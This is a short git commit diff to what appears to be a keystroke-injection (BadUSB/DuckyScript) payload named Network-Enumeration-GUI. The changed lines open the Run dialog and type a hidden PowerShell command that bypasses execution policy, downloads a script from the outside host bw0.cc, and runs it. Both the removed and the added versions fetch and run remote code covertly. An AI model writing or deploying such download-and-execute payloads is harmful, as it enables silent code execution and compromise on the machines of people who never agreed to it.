Update Network-Enumeration-GUI.txt

This commit is contained in:
egieb
2025-06-18 15:13:52 +00:00
committed by GitHub
parent 17e7ebbc56
commit 2c7d228984

View File

@@ -10,7 +10,7 @@ REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C irm https://bw0.cc/netw | iex
STRING powershell -Ep Bypass -W H -C iex (irm bw0.cc/netw)
ENTER